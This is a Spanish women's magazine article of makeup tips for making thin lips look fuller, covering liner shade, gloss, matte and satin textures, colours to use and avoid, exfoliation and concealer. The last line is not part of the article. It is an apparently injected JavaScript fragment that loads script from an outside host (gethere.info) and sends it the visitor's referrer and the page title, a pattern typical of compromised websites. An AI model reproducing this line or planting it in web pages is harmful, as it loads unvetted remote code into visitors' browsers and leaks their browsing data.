Qué tonos favorecen, cuáles debemos evitar, cómo usar el perfilador o la importancia del gloss.
En una época en la que cualquier tutorial de makeup está al alcance de la mano –por cortesía de Youtubers que alcanzan números de visitas astronómicos– y las/os gurús de la belleza crecen como setas en esa plataforma incesante llamada Instagram, hacer un artículo sobre cómo aumentar el volumen de los labios a través del maquillaje, resulta casi repetitivo.
¿Nuestro objetivo? Ponértelo fácil. ¿Cómo? Resumiendo en 10 claves el proceso de maquillaje a través de productos de belleza que ya tienes en tu neceser. Sin recurrir al complicado contouring de labios, ni trucos caseros como el del cepillo de dientes para activar la circulación, ni adquiriendo productos cuyo manual de instrucciones parece sacado de un mueble de Ikea.
Y para ello, hemos recurrido a una fuente de sabiduría que siempre funciona: el maquillador oficial de una firma de renombre. Porque la vida ya es demasiado complicada como para andar dándole al play y al stop de forma compulsiva buscando el minuto exacto de ese eterno ‘paso a paso’ en vídeo, porque ya tenemos demasiados productos que no entendemos en nuestro tocador –solo necesitarás una barra de labios, un perfilador, un gloss y algo más– y porque no hay nada más encantador que sacarle partido a lo que uno tiene por naturaleza.
una guía rápida y sencilla para maquillar tus labios y que parezcan más grandes sin complicaciones, sin pretensiones, sin perder la paciencia.
Solo con la barra de labios
“El proceso correcto para aumentar el tamaño del labio, solo con el uso del lipstick, es utilizar un pincel para perfilar el contorno y rellenar con el mismo, intentando que sea un color no muy oscuro y un tanto llamativo para conseguir un efecto de mayor volumen”.
El truco del perfilador
“Se puede conseguir el mismo efecto que con el labial pero de manera más sencilla, ya que puedes dibujar fácilmente el contorno del labio. El perfilador siempre tiene que ser un tono más claro que la barra de labios para engrosarlos, ya que si utilizaras una tonalidad más oscura que el labial, se conseguiría el efecto contrario”.
La clave está en el gloss
“El gloss es un aliado perfecto para conseguir más volumen porque el efecto óptico hará que tus labios parezcan más gruesos. Para más volumen, puedes añadir una segunda capa de gloss en el centro del labio inferior”.
Con labiales mate
“Se pueden utilizar todo tipo de texturas, tanto labiales satinados como mates. La textura satinada siempre va a resaltar más el grosor de tus labios, pero jugando con dos tonos de labial mate puedes conseguir el volumen que deseas”.
Tonos que favorecen
Si tienes unos labios finos, el experto recomienda “utilizar tonalidades corales, rosas, melocotones, rojos… Estos colores conseguirán unefecto óptico de grosor. Si, por el contrario, tus labios fueran normales o gruesos, puedes utilizar cualquier tono deseado”.
Tonalidades a evitar
“Si tienes los labios finos, evita los tonos oscuros como los granates, grosellas y burdeos. Si, por el contrario, tus labios son normales o gruesos, estas tonalidades irán perfectas, porque harán de tu boca el foco de atención”.
Sin complicaciones
“Hay productos específicos que activan el riego sanguíneo para producir este efecto de grosor, pero yo me decanto por trabajar jugando con los colores y texturas para conseguirlo”, sentencia el maquillador.
Pasos previos que funcionan
“Es muy importante mantener los labios bien cuidados e hidratados a diario. Para mejorar la circulación de éstos, es importante exfoliarlos semanalmente para eliminar las partículas muertas y protegerlos diariamente de los agentes externos tales como el sol, el viento… Así conseguirás que no envejezcan y obtendrás buenísimos resultados”.
El secreto del corrector
“Aplicar un poco de corrector un tono más claro que la base alrededor de ellos. Esto hará que parezcan más gruesos y, corrigiendo el trazo, conseguirás un acabado perfecto”.
En resumen
“Uno de los trucos que suelo utilizar para conseguir un labio más grueso es evitar las tonalidades más oscuras, perfilar bien los labios y un toque de brillo en el centro para que estos parezcan más gruesos”.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;